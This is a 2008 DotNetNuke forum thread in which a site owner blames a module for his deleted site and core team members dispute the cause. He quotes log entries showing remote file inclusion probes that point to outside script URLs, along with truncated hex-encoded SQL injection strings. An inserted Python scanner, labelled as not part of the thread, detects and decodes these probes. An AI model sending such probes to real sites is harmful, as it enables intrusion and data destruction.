DNN Community Forums > DNN Open Source > Module Forums > Feedback
Severe Security Issue
New Post
9/1/2008 5:15 AM

Hi there,

Now I'm not a hacker in any sense of the word, but I am a professional software engineer and am more than capable of making a safe website.

Anyway, my site got completely destroyed over the weekend, the root of my site was deleted, everything gone!  And considering all my site does is give people a chance to download my DJ mixes it's extremely sad.  But with that aside, I think that one of the possible holes was actually this Feedback module.

Consider the following URL,

/dnn/Guestbook/tabid/61/ include_path=http://albcrew.tw35.com/pw.txt?

I see URLs like this throughout my logs, but pointing to various different scripts.  That particular one actually acquired a load of information and then echoed it.  I've got loads of things I'm currently looking at, including encoded SQL code being passed to some modules, including the Repository module and a forum module that I actually purchased.

Anyway, hopefully this information might be of some use, any input on this would be fantastic.

 
New Post
9/1/2008 11:25 AM

Abstraction,
I feel bad about your loss but would like to point out that the feedback module goes through the same rigorous tests as ANY of the other core modules. Since you're not sure about the cause of the hack yourself, it would be appreciated if you do not attempt to spread panic with other users of the module till you can either confirm that this was indeed the source of the issue or work with the core to identify the issue. We have a specific way by which security issues are reported to the core and you can read more about it here first. 

What version of DotNetNuke itself were you running for starters?


Sanjay


AcuitiDP - Oracle Data Provider for DotNetNuke
New Post
9/1/2008 11:50 AM

Abstraction,

please notice that the inclusion of the virtual path "Guestbook" does not mean that the guestbook has been used for intrusion; actually I assume that DNN has not been hacked at all, otherwise default.aspx or another physically existing core or module file would have needed to be shown. This looks like an automated attack trying to find a vulnerability; however, it is more likely that this has been found in other software, either IIS or FTP configuration for example. If you need assistance to identify the hole, please contact security (at) dotnetnuke.com and provide as many details as possible. Thank you.


Cheers from Germany,
Sebastian Leupold

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
New Post
9/1/2008 12:01 PM

Sanjay Mehrotra wrote:

Abstraction,
I feel bad about your loss but would like to point out that the feedback module goes through the same rigorous tests as ANY of the other core modules. Since you're not sure about the cause of the hack yourself, it would be appreciated if you do not attempt to spread panic with other users of the module till you can either confirm that this was indeed the source of the issue or work with the core to identify the issue. We have a specific way by which security issues are reported to the core and you can read more about it here first. 

What version of DotNetNuke itself were you running for starters?


Sanjay

Hi Sanjay,

I don't really see what the problem was with my original post; the issue was clearly stated, and I haven't said that this module is the problem, I've said it's a possible cause of the problem, which it is.  My site was compromised via DNN, so all modules have to be taken into consideration, am I wrong?  One thing I have done is stopped PHP on my server, which will more than likely help with a lot of this.

I was running DNN 4.8.2.  Modules I had installed (all latest versions) were:

Repository Module (2 of them)
News Module with RSS feed on home page
Feedback Module on separate page called Guestbook
Presstopia Forum (Also contacted and notified of said problem), on Forum page
Chat module http://www.dotnetnuke.com/DotNetNukeProjects/ModuleChat/tabid/965/Default.aspx, on a page that was barely used

I know FTP wasn't an issue as this was merely pointing to an empty folder outside of the root of the site.

User registrations were open, and for this reason I have had to disable all that; I do not trust that side of DotNetNuke, as this has now happened twice, both times with the same modules, and it has cost me a lot of time.  My logs are full of all types of attacks, but mainly around the same modules,

e.g.

/dnn/Guestbook/tabid/61/ include_path=http://grandmalibby4u.com/galleries/extreme/on.txt?

/dnn/Guestbook/tabid/61/Default.aspx ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343

/dnn/Guestbook/tabid/61/Default.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430

The last 2 inject some scripts from other sources which are now offline; they seemed to return MySQL information.  Only the forum module and the feedback module received these types of attack.

Anyway, I'm still not 100% certain of the exact point at which it snapped, as I'm still going through the logs, but I do know that the author of the Presstopia forum has said that he hasn't been compromised in this way yet. Still, I have to keep narrowing it down of course, so I have not pointed fingers at anything yet, just merely pointed out where the possibilities lie.

Nick.
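A defender-side triage step for the kind of log lines Nick quotes above, as an added example that is not part of the original thread or of DNN: it flags the two probe shapes shown (a query parameter pointing at a remote URL, and a hex-encoded SQL batch wrapped in CAST/EXEC) and decodes the hex so the injected SQL can be read in clear text. The log layout, field order and sample lines are constructed, not taken from the post.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified IIS-like layout
# (date time method uri-stem uri-query status); not taken from the post.
SAMPLE_LOG = """\
2008-08-30 02:11:09 GET /dnn/Guestbook/tabid/61/Default.aspx include_path=http://example.invalid/pw.txt? 200
2008-08-30 02:11:10 GET /dnn/Guestbook/tabid/61/Default.aspx ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); 500
2008-08-30 02:12:41 GET /dnn/Home/tabid/36/Default.aspx - 200
"""

# Remote file inclusion probe: a query parameter set to a remote URL.
RFI_RE = re.compile(r"(?:^|[?&;])(\w+)=(?:https?|ftp)://", re.IGNORECASE)
# SQL batch smuggled as a hex literal through CAST(0x... AS [N][VAR]CHAR).
SQLI_HEX_RE = re.compile(
    r"declare\s+@\w+.*?cast\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char",
    re.IGNORECASE | re.DOTALL)

def decode_hex_payload(hex_digits):
    """Recover the SQL text that EXEC(@S) would run from the 0x... literal."""
    # A log line cut mid-literal can leave an odd trailing nibble; drop it.
    raw = bytes.fromhex(hex_digits[: len(hex_digits) & ~1])
    # NCHAR payloads are UTF-16LE (every second byte is zero); ASCII otherwise.
    if len(raw) > 1 and raw[1::2].count(0) == len(raw) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    fields = line.split(" ", 5)
    if len(fields) < 6:
        return None
    stem, query = fields[3], unquote(fields[4])  # undo %20 etc. from the wire
    m = RFI_RE.search(query)
    if m:
        return {"kind": "rfi", "stem": stem, "param": m.group(1)}
    m = SQLI_HEX_RE.search(query)
    if m:
        return {"kind": "sqli-hex", "stem": stem, "sql": decode_hex_payload(m.group(1))}
    return None

def scan_log(text):
    """Findings for every line of the log, in order."""
    return [f for f in (classify(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```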

 
New Post
9/1/2008 1:06 PM

"One thing I have done is stopped PHP on my server which will more than likely help with allot of this."

Nick - I believe you've solved your own problem. Like I'd posted on the other thread which you made on the forums, the culprit is likely to be PHP and NOT DNN. You can take the exact script you've posted here and run it on any of the websites that have the feedback module installed (mothership included) and you will not see your problem.
Someone probably did a scan on your machine and discovered that you have PHP installed and was able to take advantage of that via your website.

I've done my limited research based on what you've posted so far and Cathal will probably comment on this shortly too.

My problem with your original post is making it sound like feedback module is the culprit when you're not sure - or let me put it another way - Can you prove 100% that the feedback module caused your server to be hacked?

I'm not going to get into the semantics but as mentioned before, any security issues need to be addressed differently than simply posting on a thread without any proper validation.

Sanjay


AcuitiDP - Oracle Data Provider for DotNetNuke